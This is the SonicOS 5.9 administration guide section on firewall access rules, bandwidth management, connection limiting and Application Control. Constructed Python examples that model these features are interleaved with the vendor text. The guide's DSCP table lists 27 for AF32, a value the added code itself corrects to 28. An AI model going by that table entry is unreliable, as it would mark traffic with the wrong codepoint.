
SonicOS 5.9 Admin Guide

Firewall

Configuring Access Rules

Firewall > Access Rules

This chapter provides an overview of the stateful packet inspection default access rules on your SonicWALL security appliance, and configuration examples for customizing access rules to meet your business requirements.

Access rules are network management tools that allow you to define ingress and egress access policy, configure user authentication, and enable remote management of the SonicWALL security appliance.

The SonicOS Firewall > Access Rules page provides a sortable access rule management interface. The subsequent sections provide high-level overviews on configuring access rules by zones and configuring bandwidth management using access rules.

Stateful Packet Inspection Default Access Rules Overview

By default, the SonicWALL security appliance’s stateful packet inspection allows all communication from the LAN to the Internet, and blocks all traffic to the LAN from the Internet. The following behaviors are defined by the Default stateful inspection packet access rule enabled in the SonicWALL security appliance:

Allow all sessions originating from the LAN or WLAN to the WAN or DMZ (except when the destination is the WAN interface IP address of the SonicWALL appliance itself).
Allow all sessions originating from the DMZ to the WAN.
Deny all sessions originating from the WAN to the DMZ.
Deny all sessions originating from the WAN and DMZ to the LAN or WLAN.

Additional network access rules can be defined to extend or override the default access rules. For example, access rules can be created that allow access from the LAN zone to the WAN Primary IP address, or block certain types of traffic such as IRC from the LAN to the WAN, or allow certain types of traffic, such as Lotus Notes database synchronization, from specific hosts on the Internet to specific hosts on the LAN, or restrict use of certain protocols such as Telnet to authorized users on the LAN.

Custom access rules evaluate the source IP address, destination IP address, and IP protocol type of network traffic and compare that information against the access rules created on the SonicWALL security appliance. Network access rules take precedence and can override the SonicWALL security appliance’s stateful packet inspection. For example, an access rule that blocks IRC traffic takes precedence over the SonicWALL security appliance’s default setting of allowing this type of traffic.

CAUTION: The ability to define network access rules is a very powerful tool. Using custom access rules can disable firewall protection or block all access to the Internet. Use caution when creating or deleting network access rules.
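The precedence rules described above (custom rules first, most specific first, then the stateful-inspection default for the zone pair) can be modelled in a few lines. The following Python is an added example and is not SonicOS code: it encodes the default zone behaviour listed earlier in this section, evaluates custom rules most-specific first, and falls back to the default when nothing matches. The zone names follow the chapter; the address 203.0.113.1 standing in for the appliance's own WAN interface, the sample rule set, and the `Packet` and `Rule` types are assumptions made for this example.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Optional

# Constructed model of zone-based access rule evaluation; this is not SonicOS code.
# Default stateful-inspection behaviour as described in this chapter:
#   LAN or WLAN -> WAN or DMZ: allow (unless the destination is the appliance's own WAN IP)
#   DMZ -> WAN: allow
#   WAN -> DMZ, and WAN or DMZ -> LAN or WLAN: deny
DEFAULT_ALLOW = {("LAN", "WAN"), ("LAN", "DMZ"), ("WLAN", "WAN"),
                 ("WLAN", "DMZ"), ("DMZ", "WAN")}
WAN_INTERFACE_IP = ip_address("203.0.113.1")   # constructed sample address (RFC 5737 range)


@dataclass(frozen=True)
class Packet:
    src_zone: str
    dst_zone: str
    service: str
    src_ip: str
    dst_ip: str
    user: Optional[str] = None


@dataclass(frozen=True)
class Rule:
    action: str                       # "allow", "deny" or "discard"
    src_zone: str
    dst_zone: str
    service: str = "any"              # "any" covers every IP service
    src: str = "0.0.0.0/0"
    dst: str = "0.0.0.0/0"
    users: frozenset = frozenset()    # empty = any user

    def matches(self, pkt: Packet) -> bool:
        return (self.src_zone == pkt.src_zone
                and self.dst_zone == pkt.dst_zone
                and self.service in ("any", pkt.service)
                and ip_address(pkt.src_ip) in ip_network(self.src)
                and ip_address(pkt.dst_ip) in ip_network(self.dst)
                and (not self.users or pkt.user in self.users))


def specificity(rule: Rule) -> tuple:
    """Sort key: a named service, narrower prefixes and a user restriction all rank higher."""
    return (rule.service != "any",
            ip_network(rule.src).prefixlen + ip_network(rule.dst).prefixlen,
            bool(rule.users))


def default_action(pkt: Packet) -> str:
    """The stateful-inspection default that applies when no custom rule matches."""
    if (pkt.src_zone, pkt.dst_zone) not in DEFAULT_ALLOW:
        return "deny"
    if pkt.dst_zone == "WAN" and ip_address(pkt.dst_ip) == WAN_INTERFACE_IP:
        return "deny"    # the appliance's own WAN address is excluded from the default allow
    return "allow"


def evaluate(rules: list, pkt: Packet) -> str:
    """Custom rules are checked most-specific first and take precedence over the default."""
    for rule in sorted(rules, key=specificity, reverse=True):
        if rule.matches(pkt):
            return rule.action
    return default_action(pkt)


# Constructed rule set mirroring the chapter's examples: block IRC, restrict Telnet to
# an authorised user, and allow HTTPS management to the WAN Primary IP from the LAN.
RULES = [
    Rule("deny", "LAN", "WAN", service="irc"),
    Rule("deny", "LAN", "WAN", service="telnet"),
    Rule("allow", "LAN", "WAN", service="telnet", users=frozenset({"netadmin"})),
    Rule("allow", "LAN", "WAN", service="https", dst="203.0.113.1/32"),
]

if __name__ == "__main__":
    samples = [
        Packet("LAN", "WAN", "irc", "192.168.1.10", "198.51.100.5"),
        Packet("LAN", "WAN", "telnet", "192.168.1.10", "198.51.100.5", user="netadmin"),
        Packet("LAN", "WAN", "https", "192.168.1.10", "203.0.113.1"),
        Packet("WAN", "LAN", "http", "198.51.100.5", "192.168.1.10"),
    ]
    for pkt in samples:
        print(f"{pkt.src_zone}->{pkt.dst_zone} {pkt.service}: {evaluate(RULES, pkt)}")
```

Note that the user-restricted Telnet allow rule is listed after the Telnet deny rule but is evaluated first because it is more specific; that is the ordering the Access Rules table shows, with the Any rule at the bottom. Removing the HTTPS rule makes traffic to the appliance's own WAN address fall back to deny, which is the case the later section "Allowing WAN Primary IP Access from the LAN Zone" addresses.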

Using Bandwidth Management with Access Rules Overview

Bandwidth management (BWM) allows you to assign guaranteed and maximum bandwidth to services and prioritize traffic. Using access rules, BWM can be applied on specific network traffic. Packets belonging to a bandwidth management enabled policy will be queued in the corresponding priority queue before being sent.

You must configure Bandwidth Management individually for each interface on the Network > Interfaces page. Click the Configure icon for the interface, and select the Advanced tab. Enter your available egress and ingress bandwidths in the Available interface Egress Bandwidth (Kbps) and Available interface Ingress Bandwidth (Kbps) fields, respectively. This applies when the Bandwidth Management Type on the Firewall Services > BWM page is set to either Advanced or Global.

Example Scenario

If you create an access rule for outbound mail traffic (such as SMTP) and enable bandwidth management with the following parameters:

Guaranteed bandwidth of 20 percent
Maximum bandwidth of 40 percent
Priority of 0 (zero)

The outbound SMTP traffic is guaranteed 20% of the available bandwidth and can get as much as 40% of the available bandwidth. If SMTP traffic is the only BWM-enabled rule:

When SMTP traffic is using its maximum configured bandwidth (which is the 40% maximum described above), all other traffic gets the remaining 60% of bandwidth.
When SMTP traffic is using less than its maximum configured bandwidth, all other traffic gets between 60% and 100% of the link bandwidth.

Now consider adding the following BWM-enabled rule for FTP:

Guaranteed bandwidth of 60%
Maximum bandwidth of 70%
Priority of 1

When configured along with the previous SMTP rule, the traffic behaves as follows:

60% of total bandwidth is always reserved for FTP traffic (because of its guarantee), and 20% of total bandwidth is always reserved for SMTP traffic (because of its guarantee).
If SMTP is using 40% of total bandwidth and FTP is using 60% of total bandwidth, then no other traffic can be sent, because 100% of the bandwidth is being used by higher priority traffic. If SMTP and FTP are using less than their maximum values, then other traffic can use the remaining percentage of available bandwidth.
If SMTP traffic drops to 10% of total bandwidth, then FTP can use up to 70% and all other traffic gets the remaining 20%.
If SMTP traffic stops, FTP gets 70% and all other traffic gets the remaining 30% of bandwidth.
If FTP traffic stops, SMTP gets 40% and all other traffic gets the remaining 60% of bandwidth.
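The arithmetic in the scenario above can be checked with a small model. This Python is an added example, not the appliance's scheduler: `allocate` first honours every guarantee, then hands out what remains in priority order up to each rule's maximum, and gives the rest to traffic that no BWM rule covers; `validate` rejects guarantees that together exceed the link, which is the misconfiguration to avoid when BWM is applied to an interface. The function names, the single-link simplification and the demand figures are assumptions made for this example.

```python
from dataclasses import dataclass

# Constructed model of the guaranteed / maximum / priority semantics described in the
# Example Scenario; it is not the appliance's scheduler. All figures are percent of
# the bandwidth configured for the interface.


@dataclass(frozen=True)
class BwmRule:
    name: str
    guaranteed: int   # percent of link always available to this class when it has demand
    maximum: int      # percent of link this class may never exceed
    priority: int     # 0 is the highest priority


def validate(rules):
    """Reject configurations that cannot be honoured: a guarantee above the maximum,
    or guarantees that together exceed the interface bandwidth."""
    for r in rules:
        if not 0 <= r.guaranteed <= r.maximum <= 100:
            raise ValueError(f"{r.name}: need 0 <= guaranteed <= maximum <= 100")
    total = sum(r.guaranteed for r in rules)
    if total > 100:
        raise ValueError(f"guarantees total {total}% > 100% of the link")


def allocate(rules, demand, other_demand=100):
    """Share the link between BWM classes and unmanaged ('other') traffic.

    demand maps rule name -> percent of link the class is trying to use.
    Pass 1 honours every guarantee, pass 2 hands out the rest in priority order
    up to each maximum, and whatever is left goes to other traffic."""
    validate(rules)
    alloc = {}
    remaining = 100
    for r in rules:
        alloc[r.name] = min(demand.get(r.name, 0), r.guaranteed)
        remaining -= alloc[r.name]
    for r in sorted(rules, key=lambda r: r.priority):
        wanted = min(demand.get(r.name, 0), r.maximum) - alloc[r.name]
        extra = max(0, min(wanted, remaining))
        alloc[r.name] += extra
        remaining -= extra
    alloc["other"] = min(other_demand, remaining)
    return alloc


# The two rules from the Example Scenario.
SMTP = BwmRule("SMTP", guaranteed=20, maximum=40, priority=0)
FTP = BwmRule("FTP", guaranteed=60, maximum=70, priority=1)

if __name__ == "__main__":
    print(allocate([SMTP], {"SMTP": 100}))                  # SMTP 40, other 60
    print(allocate([SMTP, FTP], {"SMTP": 40, "FTP": 60}))   # nothing left for other
    print(allocate([SMTP, FTP], {"SMTP": 10, "FTP": 100}))  # FTP 70, other 20
    print(allocate([SMTP, FTP], {"FTP": 100}))              # SMTP idle: FTP 70, other 30
```

The guarantee pass is what makes a lower-priority rule (FTP at priority 1) keep its 60% even when the higher-priority SMTP rule has more demand than its maximum; without it, priority order alone would let SMTP take its 40% first and FTP could fall below its guarantee if the maxima were larger.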

Access Rules Configuration Tasks

Displaying Access Rules with View Styles

Access rules can be displayed in multiple views using SonicOS Enhanced. You can select the type of view from the selections in the View Style section:

All Rules - Select All Rules to display all access rules configured on the SonicWALL security appliance.
Matrix - Displays as From/To with LAN, WAN, VPN, or other interface in the From row, and LAN, WAN, VPN, or other interface in the To column. Select the Edit icon in the table cell to view the access rules.
Drop-down Boxes - Displays two drop-down menus: From Zone and To Zone. Select an interface from the From Zone menu and select an interface from the To Zone menu. Click OK and access rules defined for the two interfaces are displayed.
TIP: You can also view access rules by zones. Use the Option check boxes in the From Zone and To Zone columns: select LAN, WAN, VPN, or ALL from the From Zone column, then select LAN, WAN, VPN, or ALL from the To Zone column, and click OK to display the access rules.

Each view displays a table of defined network access rules. For example, selecting All Rules displays all the network access rules for all zones.

Configuring Access Rules for a Zone

To display the Access Rules for a specific zone, select a zone from the Matrix, Drop-down Boxes, or All Rules view.

The access rules are sorted from the most specific at the top to the least specific at the bottom of the table. At the bottom of the table is the Any rule. This default access rule covers all IP services except those addressed by the rules listed above it on the Access Rules page. Access rules can be created to override the behavior of the Any rule; for example, the Any rule allows users on the LAN to access all Internet services, including NNTP News.

You can change the priority ranking of an access rule by clicking the Arrows icon in the Priority column. The Change Priority dialog displays. Enter the new priority number (1-10) in the Priority field, and then click OK.

TIP: If the Delete or Edit icons are dimmed (unavailable), the access rule cannot be changed or deleted from the list.

Adding Access Rules

To add access rules:

1. Click Add at the bottom of the Access Rules table. The Add Rule dialog displays.
2. Select Allow | Deny | Discard from the Action list to permit or block IP traffic.
3. Select the from and to zones from the From Zone and To Zone menus.
4. Select the service or group of services affected by the access rule from the Service list. The Default service encompasses all IP services. If the service is not listed, you must define the service in the Add Service dialog. Select Create New Service or Create New Group to display the Add Service dialog or Add Service Group dialog.
5. Select the source of the traffic affected by the access rule from the Source list. Selecting Create New Network displays the Add Address Object dialog.
6. If you want to define the source IP addresses that are affected by the access rule, such as restricting certain users from accessing the Internet, type the starting IP address of the address range in the Address Range Begin field and the ending IP address in the Address Range End field. To include all IP addresses, type * in the Address Range Begin field.
7. Select the destination of the traffic affected by the access rule from the Destination list. Selecting Create New Network displays the Add Address Object dialog.
8. From the Users Allowed menu, add the user or user group affected by the access rule.
9. Select a schedule from the Schedule menu. The default schedule is Always on.
10. Enter any comments to help identify the access rule in the Comments field.
11. The Allow Fragmented Packets check box is enabled by default. Large IP packets are often divided into fragments before they are routed over the Internet and then reassembled at a destination host.
   TIP: One reason to disable this setting is that IP fragmentation can be exploited in Denial of Service (DoS) attacks.
12. Click the Advanced tab.

13. To time out the access rule after a period of TCP inactivity, set the amount of time, in minutes, in the TCP Connection Inactivity Timeout (minutes) field. The default value is 5 minutes.
14. To time out the access rule after a period of UDP inactivity, set the amount of time, in minutes, in the UDP Connection Inactivity Timeout (minutes) field. The default value is 30 minutes.
15. Specify the number of connections allowed as a percentage of the maximum number of connections allowed by the SonicWALL security appliance in the Number of connections allowed (% of maximum connections) field. Refer to Connection Limiting Overview for more information on connection limiting.
16. Select Create a reflexive rule to create a matching access rule to this one in the opposite direction, from your destination zone or address object to your source zone or address object.
17. Click the QoS tab to apply DSCP or 802.1p Quality of Service management to traffic governed by this rule. See 802.1p and DSCP QoS for more information on managing QoS marking in access rules.
18. Under DSCP Marking Settings, select the DSCP Marking Action:
   None: DSCP values in packets are reset to 0.
   Preserve (default): DSCP values in packets remain unaltered.
   Explicit: Set the DSCP value to the value selected in the Explicit DSCP Value field. This is a numeric value between 0 and 63. Some of the standard values are:
      0 - Best effort/Default (default)
      8 - Class 1
      10 - Class 1, Gold (AF11)
      12 - Class 1, Silver (AF12)
      14 - Class 1, Bronze (AF13)
      16 - Class 2
      18 - Class 2, Gold (AF21)
      20 - Class 2, Silver (AF22)
      22 - Class 2, Bronze (AF23)
      24 - Class 3
      26 - Class 3, Gold (AF31)
      27 - Class 3, Silver (AF32)
      30 - Class 3, Bronze (AF33)
      32 - Class 4
      34 - Class 4, Gold (AF41)
      36 - Class 4, Silver (AF42)
      38 - Class 4, Bronze (AF43)
      40 - Express Forwarding
      46 - Expedited Forwarding (EF)
      48 - Control
      56 - Control
   Map: The QoS mapping settings on the Firewall > QoS Mapping page will be used. See Firewall Settings > QoS Mapping (NSA Series Only) for instructions on configuring the QoS Mapping. If you select Map, you can select Allow 802.1p Marking to override DSCP values.
19. Under 802.1p Marking Settings, select the 802.1p Marking Action:
   None (default): No 802.1p tagging is added to the packets.
   Preserve: 802.1p values in packets will remain unaltered.
   Explicit: Set the 802.1p value to the value you select in the Explicit 802.1p Value field. This is a numeric value between 0 and 7:
      0 - Best effort (default)
      1 - Background
      2 - Spare
      3 - Excellent effort
      4 - Controlled load
      5 - Video (<100ms latency)
      6 - Voice (<10ms latency)
      7 - Network control
   Map: The QoS mapping settings on the Firewall > QoS Mapping page will be used. See Firewall Settings > QoS Mapping (NSA Series Only) for instructions on configuring the QoS Mapping.
20. Click OK to add the rule.

TIP: Although custom access rules can be created that allow ingress IP traffic, the SonicWALL security appliance does not disable protection from DoS attacks, such as the SYN Flood and Ping of Death attacks.
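Steps 18 and 19 choose what the rule writes into the DSCP and 802.1p fields. The following Python is an added example, not SonicOS code: `describe_dscp` derives the class-selector, assured-forwarding and expedited-forwarding names from the bit layout in RFC 2474, RFC 2597 and RFC 3246, which is how the standard values in the list above are defined (note that this layout gives 28, not 27, as the codepoint for AF32), and `mark_tos` and `mark_pcp` show the effect of the None, Preserve and Explicit actions on the IPv4 TOS/DS byte and on an 802.1Q TCI while leaving the ECN bits and the VLAN ID alone. The Map action is not modelled because its result depends on the QoS Mapping page. The function names are assumptions made for this example.

```python
from typing import Optional

# Constructed helper showing what the DSCP and 802.1p marking actions do to the bits on
# the wire; it is not SonicOS code. DSCP occupies the top 6 bits of the IPv4 TOS/DS byte
# (RFC 2474) and the low 2 bits carry ECN; the 802.1p PCP is the top 3 bits of the
# 16-bit 802.1Q TCI field, above the DEI bit and the 12-bit VLAN ID.


def describe_dscp(dscp: int) -> str:
    """Name a DSCP codepoint from its bit layout (RFC 2474 class selectors CSn,
    RFC 2597 assured forwarding AFxy, RFC 3246 expedited forwarding EF)."""
    if not 0 <= dscp <= 63:
        raise ValueError("DSCP is a 6-bit value")
    if dscp == 0:
        return "Default (best effort)"
    if dscp == 46:                      # 101110
        return "EF"
    cls, drop, low = dscp >> 3, (dscp >> 1) & 0b11, dscp & 1
    if drop == 0 and low == 0:          # xxx000: class selector
        return f"CS{cls}"
    if 1 <= cls <= 4 and low == 0:      # class 1-4 with drop precedence 1-3
        return f"AF{cls}{drop}"
    return "unassigned"


def mark_tos(tos: int, action: str, explicit: Optional[int] = None) -> int:
    """Apply a DSCP Marking Action to a TOS/DS byte, leaving the ECN bits untouched."""
    ecn = tos & 0b11
    if action == "None":
        return ecn                      # DSCP reset to 0
    if action == "Preserve":
        return tos
    if action == "Explicit":
        if explicit is None or not 0 <= explicit <= 63:
            raise ValueError("Explicit needs a DSCP value 0-63")
        return (explicit << 2) | ecn
    raise ValueError(f"unsupported action {action!r}")


def mark_pcp(tci: int, action: str, explicit: Optional[int] = None) -> int:
    """Apply an 802.1p Marking Action to a 16-bit 802.1Q TCI (PCP = bits 13-15).
    None and Preserve both leave an existing tag alone; only Explicit rewrites the PCP."""
    if action in ("None", "Preserve"):
        return tci
    if action == "Explicit":
        if explicit is None or not 0 <= explicit <= 7:
            raise ValueError("Explicit needs an 802.1p value 0-7")
        return (tci & 0x1FFF) | (explicit << 13)
    raise ValueError(f"unsupported action {action!r}")


if __name__ == "__main__":
    for value in (0, 10, 26, 28, 30, 40, 46, 48):
        print(f"DSCP {value:2d} = {value:06b} -> {describe_dscp(value)}")
    print(hex(mark_tos(0x00, "Explicit", 46)))   # EF on the wire: 0xb8
    print(hex(mark_pcp(0x0064, "Explicit", 5)))  # VLAN 100 with PCP 5: 0xa064
```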

Editing an Access Rule

To display the Edit Rule dialog (includes the same settings as the Add Rule dialog), click the Edit icon.

Deleting an Access Rule

To delete an individual access rule, click its Delete icon. To delete all access rules whose check boxes are selected, click the Delete button.

Enabling and Disabling an Access Rule

To enable or disable an access rule, click the Enable check box.

Restoring Access Rules to Default Zone Settings

To remove all end-user configured access rules for a zone, click the Default button. This restores the access rules for the selected zone to the default access rules initially set up on the SonicWALL security appliance.

Displaying Access Rule Traffic Statistics

Move your mouse pointer over the Graph icon to display the following access rule receive (Rx) and transmit (Tx) traffic statistics:

Rx Bytes
Tx Bytes
Rx Packets
Tx Packets

Connection Limiting Overview

The Connection Limiting feature is intended to offer an additional layer of security and control when coupled with such SonicOS features as SYN Cookies and Intrusion Prevention Services (IPS). Connection limiting provides a means of throttling connections through the SonicWALL using Access Rules as a classifier, and declaring the maximum percentage of the total available connection cache that can be allocated to that class of traffic.

Coupled with IPS, this can be used to mitigate the spread of a certain class of malware as exemplified by Sasser, Blaster, and Nimda. These worms propagate by initiating connections to random addresses at atypically high rates. For example, each host infected with Nimda attempted 300 to 400 connections per second, Blaster sent 850 packets per second, and Sasser was capable of 5,120 attempts per second. Typical, non-malicious network traffic generally does not establish anywhere near these numbers, particularly when it is Trusted -> Untrusted traffic (that is, LAN -> WAN). Malicious activity of this sort can consume all available connection-cache resources in a matter of seconds, particularly on smaller appliances.

In addition to mitigating the propagation of worms and viruses, connection limiting can be used to alleviate other types of connection-cache resource consumption issues, such as those posed by uncompromised internal hosts running peer-to-peer software (assuming IPS is configured to allow these services), or internal or external hosts using packet generators or scanning tools.

NOTE: The maximum number of connections a SonicWALL security appliance can support depends on the specific configuration, including whether App Flow is enabled and if an external collector is configured, as well as the physical capabilities of the particular model of SonicWALL security appliance. For more information see Connections.

Finally, connection limiting can be used to protect publicly available servers (for example, Web servers) by limiting the number of legitimate ingress connections permitted to the server (that is, to protect the server against the Slashdot effect). This is different from SYN flood protection, which attempts to detect and prevent partially-open or spoofed TCP connections. This will be most applicable for Untrusted traffic, but it can be applied to any zone traffic as needed.

Connection limiting is applied by defining a percentage of the total maximum allowable connections that may be allocated to a particular type of traffic. The above figures show the default LAN -> WAN setting, where all available resources may be allocated to LAN -> WAN (any source, any destination, any service) traffic.

More specific rules can be constructed; for example, to limit the percentage of connections that can be consumed by a certain type of traffic (for example, FTP traffic to any destination on the WAN), or to prioritize important traffic (for example, HTTPS traffic to a critical server) by allowing 100% to that class of traffic, and limiting general traffic to a smaller percentage (minimum allowable value is 1%).

NOTE: It is not possible to use IPS signatures as a connection limiting classifier; only Access Rules (that is, Address Objects and Service Objects) are permissible.
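To see why a percentage limit on an access rule protects the connection cache, the following Python is an added example and is not SonicOS code. It models a cache of 10,000 entries (a constructed figure, not any model's real capacity), one LAN host opening 400 connections per second, which is the rate range the worm figures above describe, and a public HTTPS server receiving 100 legitimate inbound connections per second. With the default LAN -> WAN class at 100% the runaway host fills the cache in 20 seconds and the server's inbound connections are then refused; with that class capped at 50%, the server is unaffected. The class names, rates and cache size are assumptions made for this example.

```python
from collections import defaultdict

# Constructed simulation of per-class connection limits on a connection cache; it is
# not SonicOS code. The class limits stand for the "% of maximum connections" value an
# access rule carries; the cache size and traffic rates are sample figures.


class ConnectionCache:
    def __init__(self, max_connections: int, class_limits: dict):
        self.max = max_connections
        # Each class may hold at most its percentage of the whole cache (1% minimum,
        # matching the smallest value the rule accepts).
        self.limits = {cls: max(1, max_connections * max(1, pct) // 100)
                       for cls, pct in class_limits.items()}
        self.counts = defaultdict(int)
        self.refused = defaultdict(int)

    def open(self, cls: str) -> bool:
        """Admit a new connection of this class unless the cache or the class limit is full."""
        total = sum(self.counts.values())
        if total >= self.max or self.counts[cls] >= self.limits[cls]:
            self.refused[cls] += 1
            return False
        self.counts[cls] += 1
        return True

    def close(self, cls: str) -> None:
        if self.counts[cls] > 0:
            self.counts[cls] -= 1


def simulate(lan_wan_limit_pct: int, seconds: int = 30, cache_size: int = 10_000):
    """One LAN host opening 400 connections/s alongside 100 legitimate inbound HTTPS
    connections/s to a server. Nothing is closed during the run, the worst case for the
    cache. Returns (runaway_host_admitted, server_admitted)."""
    cache = ConnectionCache(cache_size, {"lan_wan_any": lan_wan_limit_pct,
                                         "wan_https_server": 100})
    runaway = server = 0
    for _ in range(seconds):
        runaway += sum(cache.open("lan_wan_any") for _ in range(400))
        server += sum(cache.open("wan_https_server") for _ in range(100))
    return runaway, server


if __name__ == "__main__":
    print("default 100% LAN->WAN class:", simulate(100))  # the server loses connections
    print("LAN->WAN class limited to 50%:", simulate(50))  # the server is unaffected
```

The limit is a ceiling on cache occupancy per classifier, not a rate limit: a class that is capped keeps being refused until its existing entries time out (the TCP and UDP inactivity timeouts set on the rule's Advanced tab), which is why the runaway host's 400 attempts per second stop being admitted once its share is full while the server class, at 100%, can still claim the remaining cache.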

Access Rule Configuration Examples

This section provides configuration examples of adding network access rules.

Enabling Ping

This section provides a configuration example for an access rule that allows devices on the DMZ to send ping requests to, and receive ping responses from, devices on the LAN. By default, your SonicWALL security appliance does not allow traffic initiated from the DMZ to reach the LAN. Once you have placed one of your interfaces into the DMZ zone, perform the following steps from the Firewall > Access Rules page to configure the rule.

To enable Ping:

1. Click Add to launch the Add Rule dialog.
2. Select the Allow radio button.
3. From the Service menu, select Ping.
4. From the Source menu, select DMZ Subnets.
5. From the Destination menu, select LAN Subnets.
6. Click OK.

Blocking LAN Access for Specific Services

This section provides a configuration example for an access rule blocking LAN access to NNTP servers on the Internet during business hours.

To configure an access rule blocking LAN access to NNTP servers based on a schedule:

1. Click Add to launch the Add dialog.
2. Select Deny from the Action settings.
3. Select NNTP from the Service menu. If the service is not listed, you must add it in the Add Service dialog.
4. Select Any from the Source menu.
5. Select WAN from the Destination menu.
6. Select the schedule from the Schedule menu.
7. Enter any comments in the Comment field.
8. Click Add.

Allowing WAN Primary IP Access from the LAN Zone

By creating an access rule, it is possible to allow access to a management IP address in one zone from a different zone on the same SonicWALL appliance. For example, you can allow HTTP/HTTPS management or ping to the WAN IP address from the LAN side. To do this, you must create an access rule to allow the relevant service between the zones, giving one or more explicit management IP addresses as the destination. Alternatively, you can provide an address group that includes single or multiple management addresses (for example, WAN Primary IP, All WAN IP, All X1 Management IP) as the destination. This type of rule allows the HTTP Management, HTTPS Management, SSH Management, Ping, and SNMP services between zones.

NOTE: Access rules can only be set for inter-zone management. Intra-zone management is controlled per-interface by settings in the interface configuration.

To create a rule that allows access to the WAN Primary IP from the LAN zone:

1. On the Firewall > Access Rules page, display the LAN > WAN access rules.
2. Click Add to launch the Add dialog.
3. Select Allow from the Action settings.
4. Select one of the following services from the Service menu:
   HTTP
   HTTPS
   SSH Management
   Ping
   SNMP
5. Select Any from the Source menu.
6. Select an address group or address object containing one or more explicit WAN IP addresses from the Destination menu.
   NOTE: Do not select an address group or object representing a subnet, such as WAN Primary Subnet. This would allow access to devices on the WAN subnet (already allowed by default), but not to the WAN management IP address.
7. Select the user or group to have access from the Users Allowed menu.
8. Select the schedule from the Schedule menu.
9. Enter any comments in the Comment field.
10. Click Add.

Enabling Bandwidth Management on an Access Rule

Bandwidth management can be applied on both ingress and egress traffic using access rules. Access rules displaying the Funnel icon are configured for bandwidth management.

TIP: Do not configure bandwidth management on multiple interfaces on a zone where the configured guaranteed bandwidth for the zone is greater than the available bandwidth for the bound interface.

For information on configuring Bandwidth Management see Bandwidth Management Overview.

Configuring Application Control

About Application Control

This chapter describes how to configure and manage the Application Control feature in SonicOS.

Application Control Overview

What is Application Control?

Application Control provides a solution for setting policy rules for application signatures. Application Control policies include global App Control policies, and App Rules policies that are more targeted. You can also create certain types of App Control policies on the fly directly from the Dashboard > App Flow Monitor page.

As a set of application-specific policies, Application Control gives you granular control over network traffic on the level of users, email addresses, schedules, and IP-subnets. The primary functionality of this application-layer access control feature is to regulate Web browsing, file transfer, email, and email attachments.

In SonicOS 5.8 and higher, the ability to control application layer traffic in SonicOS is significantly enhanced with the ability to view real-time application traffic flows, and new ways to access the application signature database and to create application layer rules. SonicOS 5.8 integrates application control with standard network control features for more powerful control over all network traffic.

Beginning in SonicOS 5.9, you can use regular expressions to match patterns in network traffic. Specifically, App Control policies can utilize reassembly-free regular expression matching. This means that no buffering of the input content is required, and patterns are matched across packet boundaries.
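The reassembly-free matching described above can be illustrated with a streaming matcher. The following Python is an added example, not SonicOS's matcher: it uses a Knuth-Morris-Pratt automaton whose only state carried from one packet to the next is a single integer, so a keyword split across two TCP segments is still detected and no payload is ever buffered. The `StreamMatcher` class, the `scan_stream` helper and the sample segments are constructed for this example, and it handles a fixed byte string rather than a full regular expression (a regular expression would be compiled to a similar automaton with more states).

```python
# Constructed example of reassembly-free matching: the pattern is tracked by a
# Knuth-Morris-Pratt automaton whose only state carried between packets is an integer,
# so nothing is buffered and a match split across packets is still found. This
# illustrates the idea; it is not the appliance's own matcher.


class StreamMatcher:
    def __init__(self, pattern: bytes):
        if not pattern:
            raise ValueError("pattern must not be empty")
        self.pattern = pattern
        self.fail = self._failure(pattern)
        self.state = 0          # number of pattern bytes matched so far
        self.matches = []       # (packet_index, offset of the final byte)

    @staticmethod
    def _failure(p: bytes):
        """KMP failure table: fail[i] = length of the longest proper border of p[:i+1]."""
        fail = [0] * len(p)
        k = 0
        for i in range(1, len(p)):
            while k and p[i] != p[k]:
                k = fail[k - 1]
            if p[i] == p[k]:
                k += 1
            fail[i] = k
        return fail

    def feed(self, packet_index: int, payload: bytes) -> int:
        """Scan one packet's payload in order; returns the number of matches completed in it."""
        found = 0
        for off, b in enumerate(payload):
            while self.state and b != self.pattern[self.state]:
                self.state = self.fail[self.state - 1]
            if b == self.pattern[self.state]:
                self.state += 1
            if self.state == len(self.pattern):
                self.matches.append((packet_index, off))
                found += 1
                self.state = self.fail[self.state - 1]   # keep going for overlapping matches
        return found


def scan_stream(pattern: bytes, packets) -> list:
    """Run the matcher over a sequence of packet payloads; return all (packet, offset) hits."""
    m = StreamMatcher(pattern)
    for i, payload in enumerate(packets):
        m.feed(i, payload)
    return m.matches


# Constructed sample: a keyword split across two TCP segments of an outbound message.
SAMPLE_PACKETS = [b"Subject: Q3 numbers\r\n\r\nThis file is CONFID",
                  b"ENTIAL and must not leave the company."]

if __name__ == "__main__":
    print(scan_stream(b"CONFIDENTIAL", SAMPLE_PACKETS))   # [(1, 5)]
    print(scan_stream(b"abab", [b"ab", b"abab"]))          # overlapping: [(1, 1), (1, 3)]
```

A matcher that instead waited for the whole message would need to hold every segment until the flow ended, which is the buffering the text says is avoided; here the memory cost per flow is the automaton state, independent of how much data has passed.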

About App Control Policies

In SonicOS 5.9, there are three ways to create App Control policies and control applications in your network:

Create Rule from App Flow Monitor – The Dashboard > App Flow Monitor page provides a Create Rule button that allows you to quickly configure App Control policies for application blocking, bandwidth management, or packet monitoring. This allows you to quickly apply an action to an application that you notice while using the SonicWALL Visualization and Application Intelligence features. The policy is automatically created and displayed in the App Rules Policies table on the Firewall > App Rules page.
App Control Advanced – The Firewall > App Control Advanced page provides a simple and direct way of configuring global App Control policies. You can quickly enable blocking or logging for a whole category of applications, and can easily locate and do the same for an individual application or individual signature. When enabled, the category, application, or signature is blocked or logged globally without the need to create a policy on the Firewall > App Rules page. All application detection and prevention configuration is available on the Firewall > App Control Advanced page.
App Rules – The Firewall > App Rules page provides the third way to create an App Control policy. This method is equivalent to the method used in the original Application Firewall feature. Policies created using App Rules are more targeted because they combine a match object, action object, and possibly email address object into a policy. For flexibility, App Rules policies can access the same application controls for any of the categories, applications, or signatures available on the App Control Advanced page.

The Firewall > Match Objects page provides a way to create Application List objects, Application Category List objects, and Application Signature List objects for use as match objects in an App Rules policy. The Match Objects page is also where you can configure regular expressions for matching content in network traffic. The Firewall > Action Objects page allows you to create custom actions for use in the policy.

About Application Control Capabilities

Application Control’s data leakage prevention component provides the ability to scan files and documents for content and keywords. Using Application Control, you can restrict transfer of certain file names, file types, email attachments, attachment types, email with certain subjects, and email or attachments with certain keywords or byte patterns. You can deny internal or external network access based on various criteria. You can use Packet Monitor to take a deeper look at application traffic, and can select among various bandwidth management settings to reduce network bandwidth usage by an application.

